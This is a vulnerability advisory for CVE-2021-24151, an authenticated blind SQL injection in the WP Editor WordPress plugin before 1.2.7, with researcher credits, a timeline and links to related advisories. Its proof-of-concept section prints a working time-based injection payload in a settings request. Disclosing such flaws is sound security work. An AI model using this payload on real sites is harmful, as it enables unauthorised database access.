WP Editor < 1.2.7 – Authenticated SQL injection | CVE 2021-24151 | Plugin Vulnerabilities

Description

The plugin did not sanitise or validate its setting fields leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings.

Proof of Concept

https://drive.google.com/file/d/1KT4lHePmYuX3_6jvA4AEQ1MVDwJBlZOO/view?usp=sharing


payload: wp_editor_ajax_nonce_settings_main=bfcfabefa8&action=save_wpeditor_settings&submit=Save%20Settings&cm0s'/**/or/**/sleep(1)%23=cm0s

Affects Plugins

Fixed in 1.2.7

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website

http://research.sun-asterisk.com/

Verified

Yes

WPVDB ID

5ee77dd7-5a73-4d4e-8038-23e6e763e20c

Timeline

Publicly Published

2021-02-01 (about 4 years ago)

Added

2021-02-01 (about 4 years ago)

Last Updated

2021-02-02 (about 4 years ago)

Other

Published

Title

Published

2022-01-14

Title

Ad Invalid Click Protector (AICP) < 1.2.6 - Authenticated SQL Injection

Published

2025-03-27

Title

Lead Form Data Collection to CRM < 3.1 - Authenticated (Contributor+) SQL Injection

Published

2025-10-23

Title

RapidResult < 1.3 - Authenticated (Contributor+) SQL Injection

Published

2014-08-01

Title

oQey Gallery <= 0.4.8 - SQL Injection

Published

2016-12-14

Title

Xtreme Locator Dealer Locator Plugin 1.5 – Authenticated SQL Injection